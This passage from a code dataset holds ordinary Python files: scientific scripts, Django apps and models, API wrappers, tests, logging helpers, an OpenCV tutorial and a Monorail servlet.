= pairs.replace(\" \", \"\")\n pairs = pairs.split('and')\n for pair in pairs:\n tmp = []\n pair = pair.split(',')\n for atom in pair:\n tmp.append(atom)\n h_atom_list.append(tmp)\n else:\n h_atom_list = None\n\n if args['--o_atom_list']:\n o_atom_list = []\n pairs = args['--o_atom_list']\n pairs = pairs.replace(\" \", \"\")\n pairs = pairs.split('and')\n for pair in pairs:\n tmp = []\n pair = pair.split(',')\n for atom in pair:\n tmp.append(atom)\n o_atom_list.append(tmp)\n else:\n o_atom_list = None\n\n if args['--auto_select']:\n auto_select = args['--auto_select']\n auto = ['1', '2', '3', 'ar']\n if auto_select not in auto:\n raise ValueError('Allowed automatic selections {}'.format(auto))\n if c_atom_list is not None or h_atom_list is not None:\n raise ValueError('Automatic target atom selection will conflict with populated atom lists')\n else:\n if c_atom_list is None and h_atom_list is None and o_atom_list is None:\n raise ValueError('No target atoms specified')\n else:\n auto_select = None\n\n if args['--job_type']:\n job_type = args['--job_type'][0]\n allowed_jobs = ['F', 'Cl', 'N', 'NxF', 'NxCl', 'S', 'VDW']\n if job_type not in allowed_jobs:\n raise ValueError('Allowed elements {}'.format(allowed_jobs))\n else:\n job_type = 'F'\n logger.debug(msg.format('job_type', job_type))\n\n if args['--output_folder']:\n output_folder = args['--output_folder']\n else:\n output_folder = './' + mol_name + '_' + job_type + '/'\n logger.debug(msg.format('output folder', output_folder))\n\n if args['--num_gpu']:\n num_gpu = int(args['--num_gpu'])\n else:\n num_gpu = 1\n logger.debug(msg.format('number of GPUs per node', num_gpu))\n\n if args['--num_fep']:\n num_fep = args['--num_fep']\n else:\n num_fep = 1\n logger.debug(msg.format('number of FEP calculations', num_fep))\n\n\n LigCharOpt(output_folder, mol_name, ligand_name, net_charge, complex_name, solvent_name,\n job_type, auto_select, c_atom_list, h_atom_list, o_atom_list, num_frames, charge_only, vdw_only, gaff_ver,\n opt, num_gpu, num_fep, equi, central_diff, opt_name, opt_steps, rmsd)\n\n","sub_path":"LigCharOpt/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"456395826","text":"from Configs.Configs import INIT_PARAMS\nimport logging\nfrom datetime import datetime\n\nclass UtilsService:\n\n @staticmethod\n def split_dataframe(df, ratio):\n split_point = int(len(df) * ratio)\n return (df.iloc[:split_point, :], df.iloc[split_point:, :])\n\n @staticmethod\n def get_logger():\n logger = logging.getLogger('PairsTradingLogger')\n if not logger.handlers:\n hdlr = logging.FileHandler(INIT_PARAMS['log_path'] + f'\\\\{datetime.now().date()}.log')\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n hdlr.setFormatter(formatter)\n logger.addHandler(hdlr)\n logger.setLevel(logging.INFO)\n return logger","sub_path":"UtilsService/UtilsService.py","file_name":"UtilsService.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"198071163","text":"from django.http import JsonResponse, HttpRequest\nfrom .client import RestClient\n\nclient = RestClient(\"login\", \"password\")\n\n# Funciones V3\nKEY = \"key\"\nCOMPETITION = \"competition\"\nCPC = \"cpc\"\nSEARCH_VOLUME = \"search_volume\"\n\nfiltrosAPI_related = {KEY: \"keyword_data.keyword\", COMPETITION: \"keyword_data.keyword_info.competition\", CPC: \"keyword_data.keyword_info.cpc\", SEARCH_VOLUME: \"keyword_data.keyword_info.search_volume\",}\nfiltrosAPI = {KEY: \"keyword\", COMPETITION: \"keyword_info.competition\", CPC: \"keyword_info.cpc\", SEARCH_VOLUME: \"keyword_info.search_volume\",}\n\n# Extracción de países e Idiomas\ndef paises_v3():\n response = client.get(\"/v3/dataforseo_labs/locations_and_languages\")\n paises = list()\n if response[\"status_code\"] == 20000:\n resultado = response[\"tasks\"][0][\"result\"]\n # do something with result\n for res in resultado:\n paises.append(\n (\n str(res[\"location_code\"])\n + \"/\"\n + res[\"available_languages\"][0][\"language_code\"],\n res[\"available_languages\"][0][\"language_code\"]\n + \"/\"\n + res[\"country_iso_code\"],\n )\n )\n return paises\n\n else:\n print(\n \"error. Code: %d Message: %s\"\n % (response[\"status_code\"], response[\"status_message\"])\n )\n\n# Keywords relacionadas\ndef related_keywords_v3(keyword, country_code, language_code, depth, limit, filters):\n post_data = dict()\n name = {\"name\": \"relacionadas\"}\n # simple way to set a task\n post_data[len(post_data)] = dict(\n keyword=keyword,\n location_code=country_code,\n language_code=language_code,\n depth=depth,\n limit=limit,\n )\n\n # Comprobar si filtros y añadirlos\n if filters:\n for row in filters:\n if type(row) is list:\n row[0] = filtrosAPI_related[row[0]]\n\n post_data[0]['filters'] = filters\n\n response = client.post(\"/v3/dataforseo_labs/related_keywords/live\", post_data)\n if response[\"status_code\"] == 20000:\n print(response)\n # Si hay resultados\n if response[\"tasks\"][0][\"result_count\"] != 0:\n # do something with result\n response[\"tasks\"][0][\"result\"][0]['name'] = \"relacionadas\"\n return response[\"tasks\"][0][\"result\"][0]\n else:\n response[\"tasks\"][0][\"result\"] = list()\n response[\"tasks\"][0][\"result\"].append(name)\n return response[\"tasks\"][0][\"result\"][0]\n\n else:\n print(\n \"error. Code: %d Message: %s\"\n % (response[\"status_code\"], response[\"status_message\"])\n )\n\n# Keywords sugeridas\ndef keyword_suggestions_v3(keyword, country_code, language_code, limit, filters):\n post_data = dict()\n name = {\"name\": \"similares\"}\n # simple way to set a task\n post_data[len(post_data)] = dict(\n keyword=keyword,\n location_code=country_code,\n language_code=language_code,\n limit=limit,\n )\n\n # Comprobar si filtros y añadirlos\n if filters:\n for row in filters:\n if type(row) is list:\n row[0] = filtrosAPI[row[0]]\n post_data[0]['filters'] = filters\n\n response = client.post(\"/v3/dataforseo_labs/keyword_suggestions/live\", post_data)\n if response[\"status_code\"] == 20000:\n # Si hay resultados\n if response[\"tasks\"][0][\"result_count\"] != 0:\n # do something with result\n return response[\"tasks\"][0][\"result\"][0]\n else: \n response[\"tasks\"][0][\"result\"] = list()\n response[\"tasks\"][0][\"result\"].append(name)\n return response[\"tasks\"][0][\"result\"][0]\n else:\n print(\n \"error. Code: %d Message: %s\"\n % (response[\"status_code\"], response[\"status_message\"])\n )\n\n# Search Volume Bulk\ndef bulk_search_volume_v3(keywords, country_code, language_code):\n post_data = dict()\n \n post_data[len(post_data)] = dict(\n location_code=country_code,\n language_code=language_code,\n keywords=keywords\n )\n \n response = client.post(\"/v3/keywords_data/google/search_volume/live\", post_data)\n \n if response[\"status_code\"] == 20000:\n return response[\"tasks\"][0][\"result\"]\n else:\n print(\"error. Code: %d Message: %s\" % (response[\"status_code\"], response[\"status_message\"]))\n","sub_path":"dataforseo/dataforseo_functions.py","file_name":"dataforseo_functions.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"277527099","text":"#urls.py - URL patterns for Guestbook App\nfrom django.conf.urls.defaults import *\n\nurlpatterns = patterns('guestbookapp.views',\n url(r'^guestbook$', 'home', name='guestbook_home'),\n url(r'^(?P\\d+)?$', 'info', name='guestbook_info'),\n url(r'^update_status$', 'update_status', name='guestbook_update_status'),\n \n # Log the user out. This is required by Facebook Policy:\n # http://developers.facebook.com/policy/#policies\n url(r'^logout$', 'logout', name='guestbook_logout'), \n # Where the user gets redirected after logging out\n url(r'^logged_out$', 'logged_out', name='guestbook_logged_out'),\n)\n","sub_path":"guestbookapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"281778707","text":"import time\nstart = time.time()\n\ndef getFacto (nb):\n if nb == 0 :\n return 1\n else :\n pro = 1\n for i in range(1, nb+1) :\n pro *= i\n return pro\n\ntotal = 0\nfor i in range (3, 2540160) :\n temp = 0\n for j in range(0,len(str(i))) :\n temp += getFacto(int(str(i)[j]))\n if temp == i :\n total += i\n\nprint('Euler n°34 answer :',total)\nprint('Find in :', \"%.2f\" % (time.time()-start),'sec')\n","sub_path":"021-040/Euler_034.py","file_name":"Euler_034.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"493830766","text":"import numpy as np\n\ndef eigen(M):\n# Menghitung vektor dan nilai eigen dengan algoritma simultaneous power iteration\n m, n = M.shape\n # mengisi Q dengan nilai random\n Q = np.random.rand(m,m)\n # Dekomposisi QR\n Q, R = np.linalg.qr(Q)\n prevQ = Q\n # Iterasi hingga error cukup kecil\n for i in range(200):\n Temp = np.dot(M,Q)\n Q, R = np.linalg.qr(Temp)\n error = ((Q - prevQ) ** 2).sum()\n prevQ = Q\n if error < 0.001:\n break\n e_val = np.diag(R)\n e_vec = Q\n return e_val, e_vec\n","sub_path":"src/vektor.py","file_name":"vektor.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165627536","text":"from bsread import source\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom datetime import datetime\n# For PSEN Alvra\n\nCamera_image = 'SARES11-SPEC125-M2:FPICTURE'\nROI_background = 'SARES11-SPEC125-M2.roi_background_x_profile'\nROI_signal = 'SARES11-SPEC125-M2.roi_signal_x_profile'\nproc_para ='SARES11-SPEC125-M2.processing_parameters'\n\nChannels = [Camera_image, ROI_background, ROI_signal, proc_para]\nwith source(channels=Channels) as stream:\n message = stream.receive()\n\nexec('ProcPara='+message.data.data[proc_para].value)\nimgShape =message.data.data[Camera_image].value.shape\n\nplt.figure(figsize = [15,10])\nplt.subplot(311)\nplt.imshow(message.data.data[Camera_image].value)\nplt.title(Camera_image+', pulse ID '+str(message.data.pulse_id)+'\\n '+str(datetime.fromtimestamp(message.data.global_timestamp)))\nAxis = plt.gca()\nAxis.add_patch(Rectangle((ProcPara['roi_signal'][0],ProcPara['roi_signal'][2]),ProcPara['roi_signal'][1],ProcPara['roi_signal'][3], edgecolor = 'r', fill = False, linewidth = 3))\nAxis.add_patch(Rectangle((ProcPara['roi_background'][0],ProcPara['roi_background'][2]),ProcPara['roi_background'][1],ProcPara['roi_background'][3], edgecolor = 'k', fill = False, linewidth = 3))\n\n\nplt.subplot(312)\nplt.plot(message.data.data[ROI_background].value, color = 'k')\nplt.title('ROI background:'+str(ProcPara['roi_background']))\nplt.grid(True)\nplt.subplot(313)\nplt.plot(message.data.data[ROI_signal].value, color = 'r')\nplt.grid(True)\nplt.title('ROI signal:'+str(ProcPara['roi_signal']))\nplt.show()\n","sub_path":"Alvra/SpectralEncoding/125M2_processing_alvra.py","file_name":"125M2_processing_alvra.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"45675408","text":"# K-Means Clustering : Silrouette 계수 확인\n\nfrom sklearn.datasets import make_blobs\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nimport numpy as np\nfrom matplotlib import cm\nfrom sklearn.metrics import silhouette_samples\n\n# 시험용 데이터 세트를 구성한다\nX, y = make_blobs(n_samples=150, n_features=2, centers=3, cluster_std=0.5, shuffle=True, random_state=0)\n\n# K-means 알고리즘으로 시험용 데이터를 3 그룹으로 분류한다 (k = 3)\nkm = KMeans(n_clusters=3, init='k-means++', n_init=10, max_iter=300, tol=1e-04, random_state=0)\nkm = km.fit(X)\ny_km = km.predict(X)\n\n# 분류 결과를 표시한다\nplt.figure(figsize=(6, 5))\nplt.scatter(X[y_km == 0, 0], X[y_km == 0, 1], s=100, c='green', marker='s', alpha=0.5, label='cluster 1')\nplt.scatter(X[y_km == 1, 0], X[y_km == 1, 1], s=100, c='orange', marker='o', alpha=0.5, label='cluster 2')\nplt.scatter(X[y_km == 2, 0], X[y_km == 2, 1], s=100, c='blue', marker='v', alpha=0.5, label='cluster 3')\nplt.scatter(km.cluster_centers_[:,0], km.cluster_centers_[:,1], s=250, marker='+', c='red', label='centroids')\nplt.legend()\nplt.grid()\nplt.ylabel('y')\nplt.xlabel('X')\nplt.show()\n\ntrc_silhouette = []\nfor i in range(2, 10):\n # K-means 알고리즘으로 시험용 데이터를 3 그룹으로 분류한다 (k = 3)\n km = KMeans(n_clusters=i, init='k-means++', n_init=10, max_iter=300, tol=1e-04, random_state=0)\n km = km.fit(X)\n y_km = km.predict(X)\n silhouette_vals = silhouette_samples(X, y_km, metric='euclidean')\n trc_silhouette.append(np.mean(silhouette_vals))\n\n# 실루엣 계수를 확인한다.\nplt.plot(np.arange(2, 10), trc_silhouette, marker='o')\nplt.show()","sub_path":"Multicampus/ML/day4/silhouette.py","file_name":"silhouette.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"283773673","text":"import pytest\nfrom loqusdb.utils import (delete_family, load_family)\nfrom loqusdb.exceptions import CaseError\n\ndef test_delete_family(mongo_adapter):\n db = mongo_adapter.db\n \n case = {\n 'case_id': '1',\n 'vcf_path': 'path_to_vcf'\n }\n \n load_family(\n adapter=mongo_adapter,\n case_id=case['case_id'],\n vcf_path=case['vcf_path']\n )\n \n mongo_case = db.case.find_one()\n \n assert mongo_case['case_id'] == case['case_id']\n \n delete_family(\n adapter=mongo_adapter,\n family_id='1',\n )\n \n mongo_case = db.case.find_one()\n \n assert mongo_case == None\n\ndef test_delete_non_existing_family(mongo_adapter):\n db = mongo_adapter.db\n \n with pytest.raises(CaseError):\n delete_family(\n adapter=mongo_adapter,\n family_id='1',\n )\n","sub_path":"tests/utils/test_delete_family.py","file_name":"test_delete_family.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"245413207","text":"import logging\n\n# create logger with 'spam_application'\nlogger = logging.getLogger('influx-trending')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('/var/log/influx-trending.log')\nfh.setLevel(logging.DEBUG)\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"366736214","text":"import collections\n# KHANS - COUNTER VERISON\nclass Solution2:\n def canFinish(self, numCourses: int, prerequisites):\n \n # ONLY TRACKING THE NUMBER OF INCOMING EDGES - NOT SPECIFIC EDGES\n # ONLY TRACKING THE NUMBER OF INCOMING EDGES - NOT SPECIFIC EDGES\n incoming = collections.defaultdict(int)\n outgoing = collections.defaultdict(set)\n\n for course, preReq in prerequisites:\n incoming[course] +=1\n outgoing[preReq].add(course)\n\n # ADD ALL THE NODES WITH NO INCOMING EDGES\n stack = [node for node in range(numCourses) if not incoming[node]]\n topOrder = []\n\n\n # WHILE YOU STILL HAVE A NODE WITH NO INCOMING EDGES LEFT\n while stack:\n node = stack.pop()\n\n # WE HAVE COMPLETED THIS COURSE, ADD IT TO TOPORDER\n topOrder.append(node)\n\n #DECREMENT ONE OF THIS NODES PREREQS\n for neigh in outgoing[node]:\n incoming[neigh] -=1\n\n #If NO more PREREQS then add NEIGH to STACK\n if incoming[neigh] == 0:\n stack.append(neigh)\n\n # NO MORE PREREQS SO REMOVE FROM INCOMING OR \"PREREQ LIST\"\n incoming.pop(node)\n \n # If theres no nodes with incoming edges at the end we know no cycles\n return \"cycle\" if incoming else topOrder\n \nprint(Solution2().canFinish(11,[[1,0],[2,1],[3,2],[5,10]])) # [10, 5, 9, 8, 7, 6, 4, 0, 1, 2, 3]\n\n\n","sub_path":"Basic Algorithms/topSort/khans.py","file_name":"khans.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"422135247","text":"from django.db import models\n\n\n'''\n@author: WanLing (Liddy) Hsieh \nAssignment2 - http://127.0.0.1:8000/api/cards \nDescription - Add a many-to-one relationship, i.e., a Kanban card may have 0 or more\ntasks. Each task has the following fields:\n1. description: as a required string\n2. done: as a boolean value, with False as the default value\n'''\n# Create your models here.\nclass Card(models.Model):\n title = models.CharField(\n max_length=250,\n unique= True) #unique, required, not blank\n description = models.CharField(\n max_length=250,\n blank=True, #optional\n default='')\n status = models.CharField(\n max_length=250, #required\n choices=(\n ('to-do', 'To Do'),\n ('in-progress', 'In Progress'),\n ('done', 'Complete')\n )\n )\n created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return '{}: {} ({})'.format(\n self.id,\n self.title,\n self.get_status_display()\n )\n\n\nclass Task(models.Model):\n description = models.CharField(max_length=250)\n done = models.BooleanField(default=False)\n card = models.ForeignKey(\n Card,\n related_name='tasks',\n on_delete=models.CASCADE\n )\n\n class Meta:\n unique_together = ('card', 'description')","sub_path":"kanbanProject/kanban_Assign2/cards/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"116029321","text":"import cv2 as cv\nimport numpy as np\nimport random\n\nblank=np.zeros((500,500,3), dtype='uint8')\nim=cv.imread('pokeon.jpg')\nimg=cv.resize(cv.imread('pokeon.jpg'), (0,0), fx=0.2, fy=0.2,interpolation=cv.INTER_AREA)\n#cv.rectangle(blank,(0,0),(blank.shape[0]//3,blank.shape[1]//3),(34,47,132),thickness=-1)\n#cv.circle(blank,(blank.shape[0]//3,blank.shape[1]//3),30,(34,47,132),thickness=-1)\n\"\"\"\nim=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nblur=cv.GaussianBlur(img, (5,5), cv.BORDER_DEFAULT)#blurring an image,\nedge=cv.Canny(img, 125, 175)\ndilate=cv.dilate(edge,(7,7),iterations=3)\neroded=cv.erode(edge,(7,7), iterations=3)\ncv.imshow('Eroded_image',eroded)\ncv.imshow('Dilated_image',dilate)\n\"\"\"\n\ndef translate(img, x,y):\n TranslateMat=np.float32([[1,0,x],[0,1,y]])#takes a 2x3 translation matrix\n dim=(img.shape[1],img.shape[0])\n return cv.warpAffine(img,TranslateMat,dim)#transformational functions\n \ndef rotate(img,angle,rotPoint=None):\n width, height=img.shape[1], img.shape[0]\n dim=(width,height)\n if rotPoint==None:\n rotPoint=(img.shape[1]//2,img.shape[0]//2)\n rotateMat=cv.getRotationMatrix2D(rotPoint,angle,1.0) \n return cv.warpAffine(img,rotateMat,dim)\nx=0 \ny=0\ntheta=0\nwhile True:\n im2=translate(img,x,y)\n im2=rotate(img,theta) \n cv.imshow('translate&rotate_image',im2) \n x=x+random.randint(-1,1)\n y=y+random.randint(-1,1)\n theta=random.randint(0,360)\n if cv.waitKey(50) & 0xFF==ord('a'):\n break\n#cv.imshow('Edges',edge)\n#cv.imshow('clear_image',img)\n#cv.imshow('blurred_image', blur)\n#cv.waitKey(0)\ncv.destroyAllWindows()\n\n\"\"\"\nfliped=cv.flip(img,1)\ncv.imshow('Flip',fliped)\ncropped_image=img[100:400, 200:400]\ncv.imshow('Cropped',cropped_image)\n\"\"\"\ncv.waitKey(0)","sub_path":"opencvtut2.py","file_name":"opencvtut2.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"495088045","text":"'''http://www.reddit.com/r/dailyprogrammer/comments/1m71k9/091113_challenge_133_intermediate_chain_reaction/\n''' \n\nimport time\n\nmultilineInput = input('press ENTER to enter each line seperately.\\nCopy and paste the list of definitions and press ENTER to use multiline inputs.\\nAlso try sample for the sample output and !.\\n')\nif multilineInput == '':\n N,M=input().split() #number of 'element types' and grid size resp.\n N,M=int(N),int(M)\n eltInput = [input() for _ in range(N)] #list of element definitions\n\nelif multilineInput == '!':\n import random\n random.seed()\n\n M = random.randint(5,7)\n N = min(random.randint(M,M*M),26)\n directs = 'udlr'\n eltInput = [0 for _ in range(N)]\n #eltInput[0] = str(N) + ' ' + str(M) \n numbersInMxM = random.sample(range(M*M),N)\n coords = [str(x//M)+' '+str(x%M) for x in numbersInMxM]\n for i in range(N):\n radius = str(random.randint(M//4,M//2))\n eltInput[i] = coords[i] + ' ' + radius + ' ' + ''.join(random.sample(directs,random.randint(3,4)))\n print(str(N) + ' ' + str(M))\n print('\\n'.join(eltInput))\n\nelif multilineInput == 'sample':\n N,M = 4,5\n eltInput = ['0 0 5 udlr','4 0 5 ud','4 2 2 lr','2 3 3 udlr']\n print('\\n'.join(eltInput))\nelse:\n multilineInput = multilineInput.split('\\n')\n N,M = multilineInput[0].split()\n N,M = int(N), int(M)\n eltInput = [multilineInput[i+1] for i in range(N)]\n \n\n#legend: 0 - x, 2 - y coords, 4 - radius, udlr means can propogate up/down/left/right.\n\neltList = [[0 for _ in range(4)] for _ in range(N)]\nfor i in range(N):\n eltList[i][0],eltList[i][1],eltList[i][2],eltList[i][3] = eltInput[i].split()\n for j in range(3):\n eltList[i][j] = int(eltList[i][j])\n\neltFind = {} #this 'reverse searches' eltList, taking first two coords and outputting index\nfor i in range(N):\n eltFind[2**eltList[i][0]*3**eltList[i][1]] = i \n\nstep=0\n\neltList[0][3] += 'A' #make first element active; we take (A in elt) to mean that elt is active\n\ngrid = [[' ' for _ in range(M)]for _ in range(M)] #note that coords go grid[x][y]\noldGrid = [[' ' for _ in range(M)]for _ in range(M)] #to determine when to break out of while loop\nalph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\ndef displayGrid():\n print('step '+str(step)+':')\n output = ''\n for i in range(M): \n for j in range(M):\n output += grid[j][i]\n output += '\\n'\n print(output)\n time.sleep(1)\n\ntemp=0\nfor elt in eltList:\n grid[elt[0]][elt[1]] = alph[temp]\n temp+=1\n\ndisplayGrid()\n \nwhile N!=0:\n \n for i in range(M): #store grid in oldGrid for comparison later\n for j in range(M):\n oldGrid[i][j] = grid[i][j]\n \n for elt in eltList:\n if 'A' in elt[3]:\n if grid[elt[0]][elt[1]] in alph: #'x' it out if it isn't already; counts as a step\n grid[elt[0]][elt[1]] = 'x' # only affects first element, can be optimised\n elt[3] = elt[3].replace('A','D') #D for dead\n \n step+=1\n displayGrid()\n \n for i in range(1,elt[2]+1):#check for collisions\n if 'r' in elt[3] and elt[0]+i in range(0,M) and grid[elt[0]+i][elt[1]] in alph:\n grid[elt[0]+i][elt[1]] = 'x'\n eltList[eltFind[2**(elt[0]+i)*3**elt[1]]][3] += 'B'\n elt[3] = elt[3].replace('A','D') #unsure if this line speeds up program\n \n if 'l' in elt[3] and elt[0]-i in range(0,M) and grid[elt[0]-i][elt[1]] in alph:\n grid[elt[0]-i][elt[1]] = 'x'\n eltList[eltFind[2**(elt[0]-i)*3**elt[1]]][3] += 'B'\n elt[3] = elt[3].replace('A','D')\n \n if 'd' in elt[3] and elt[1]+i in range(0,M) and grid[elt[0]][elt[1]+i] in alph: \n grid[elt[0]][elt[1]+i] = 'x'\n eltList[eltFind[2**elt[0]*3**(elt[1]+i)]][3] += 'B'\n elt[3] = elt[3].replace('A','D')\n \n if 'u' in elt[3] and elt[1]-i in range(0,M) and grid[elt[0]][elt[1]-i] in alph:\n grid[elt[0]][elt[1]-i] = 'x'\n eltList[eltFind[2**elt[0]*3**(elt[1]-i)]][3] += 'B'\n elt[3] = elt[3].replace('A','D')\n \n\n if oldGrid == grid:\n break \n \n step+=1\n for elt in eltList:\n elt[3] = elt[3].replace('B','A')\n displayGrid()\n","sub_path":"09:13:13 #133 [intermediate] Chain Reaction Redone.py","file_name":"09:13:13 #133 [intermediate] Chain Reaction Redone.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"529685005","text":"from django.db import models\nfrom django.core.validators import MinValueValidator\n\n\n# Create your models here.\n\n\nclass Category(models.Model):\n # name of category (primary_key)\n name = models.CharField(\n 'name',\n primary_key=True,\n max_length=50,\n null=False,\n blank=False,\n )\n\n class Meta:\n verbose_name = 'Category'\n verbose_name_plural = 'Category'\n\n def __str__(self):\n return str(self.name)\n\n def __unicode__(self):\n return str(self)\n\n\nclass Product(models.Model):\n # name of product\n name = models.CharField(\n 'name',\n primary_key=True,\n max_length=50,\n null=False,\n blank=False,\n )\n\n # foreign key to product.Category model\n category = models.ForeignKey(\n Category,\n on_delete=models.SET_NULL,\n null=True,\n related_name='category_content'\n\n )\n\n class Meta:\n verbose_name = 'Product'\n verbose_name_plural = 'Products'\n\n def __str__(self):\n return str(self.name)\n\n def __unicode__(self):\n return str(self)\n\n\nclass ProductCustomization(models.Model):\n # foreign key to product.Product\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE,\n related_name='product_options'\n )\n\n # products options\n customizable = models.CharField(\n 'customizable',\n max_length=50,\n )\n\n # price\n price = models.PositiveSmallIntegerField(\n 'price',\n blank=False,\n null=False,\n validators=[MinValueValidator(1)]\n )\n\n # product is_available or not\n is_available = models.BooleanField(\n 'is_available',\n default=True\n )\n\n class Meta:\n unique_together = ('product', 'customizable')\n verbose_name = 'Product_customization'\n verbose_name_plural = 'Product_customization'\n\n def __str__(self):\n return str(self.product)\n\n def __unicode__(self):\n return str(self)\n","sub_path":"CoffeeShop/apps/restframework/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"386378486","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file or at\n# https://developers.google.com/open-source/licenses/bsd\n\n\"\"\"A class to display a user group, including a paginated list of members.\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport logging\nimport time\n\nfrom third_party import ezt\n\nfrom framework import exceptions\nfrom framework import framework_helpers\nfrom framework import framework_views\nfrom framework import paginate\nfrom framework import permissions\nfrom framework import servlet\nfrom project import project_helpers\nfrom proto import usergroup_pb2\nfrom sitewide import group_helpers\nfrom sitewide import sitewide_views\n\nMEMBERS_PER_PAGE = 50\n\n\nclass GroupDetail(servlet.Servlet):\n \"\"\"The group detail page presents information about one user group.\"\"\"\n\n _PAGE_TEMPLATE = 'sitewide/group-detail-page.ezt'\n\n def AssertBasePermission(self, mr):\n \"\"\"Assert that the user has the permissions needed to view this page.\"\"\"\n super(GroupDetail, self).AssertBasePermission(mr)\n\n group_id = mr.viewed_user_auth.user_id\n group_settings = self.services.usergroup.GetGroupSettings(\n mr.cnxn, group_id)\n if not group_settings:\n return\n\n member_ids, owner_ids = self.services.usergroup.LookupAllMembers(\n mr.cnxn, [group_id])\n (owned_project_ids, membered_project_ids,\n contrib_project_ids) = self.services.project.GetUserRolesInAllProjects(\n mr.cnxn, mr.auth.effective_ids)\n project_ids = owned_project_ids.union(\n membered_project_ids).union(contrib_project_ids)\n if not permissions.CanViewGroupMembers(\n mr.perms, mr.auth.effective_ids, group_settings, member_ids[group_id],\n owner_ids[group_id], project_ids):\n raise permissions.PermissionException(\n 'User is not allowed to view a user group')\n\n def GatherPageData(self, mr):\n \"\"\"Build up a dictionary of data values to use when rendering the page.\"\"\"\n group_id = mr.viewed_user_auth.user_id\n group_settings = self.services.usergroup.GetGroupSettings(\n mr.cnxn, group_id)\n if not group_settings:\n raise exceptions.NoSuchGroupException()\n\n member_ids_dict, owner_ids_dict = (\n self.services.usergroup.LookupVisibleMembers(\n mr.cnxn, [group_id], mr.perms, mr.auth.effective_ids,\n self.services))\n member_ids = member_ids_dict[group_id]\n owner_ids = owner_ids_dict[group_id]\n member_pbs_dict = self.services.user.GetUsersByIDs(\n mr.cnxn, member_ids)\n owner_pbs_dict = self.services.user.GetUsersByIDs(\n mr.cnxn, owner_ids)\n member_dict = {}\n for user_id, user_pb in member_pbs_dict.items():\n member_view = group_helpers.GroupMemberView(user_pb, group_id, 'member')\n member_dict[user_id] = member_view\n owner_dict = {}\n for user_id, user_pb in owner_pbs_dict.items():\n member_view = group_helpers.GroupMemberView(user_pb, group_id, 'owner')\n owner_dict[user_id] = member_view\n\n member_user_views = []\n member_user_views.extend(\n sorted(list(owner_dict.values()), key=lambda u: u.email))\n member_user_views.extend(\n sorted(list(member_dict.values()), key=lambda u: u.email))\n\n group_view = sitewide_views.GroupView(\n mr.viewed_user_auth.email, len(member_ids), group_settings,\n mr.viewed_user_auth.user_id)\n url_params = [(name, mr.GetParam(name)) for name in\n framework_helpers.RECOGNIZED_PARAMS]\n pagination = paginate.ArtifactPagination(\n member_user_views, mr.GetPositiveIntParam('num', MEMBERS_PER_PAGE),\n mr.GetPositiveIntParam('start'), mr.project_name, group_view.detail_url,\n url_params=url_params)\n\n is_imported_group = bool(group_settings.ext_group_type)\n\n offer_membership_editing = permissions.CanEditGroup(\n mr.perms, mr.auth.effective_ids, owner_ids) and not is_imported_group\n\n group_type = 'Monorail user group'\n if group_settings.ext_group_type:\n group_type = str(group_settings.ext_group_type).capitalize()\n\n return {\n 'admin_tab_mode': self.ADMIN_TAB_META,\n 'offer_membership_editing': ezt.boolean(offer_membership_editing),\n 'initial_add_members': '',\n 'initially_expand_form': ezt.boolean(False),\n 'groupid': group_id,\n 'groupname': mr.viewed_username,\n 'settings': group_settings,\n 'group_type': group_type,\n 'pagination': 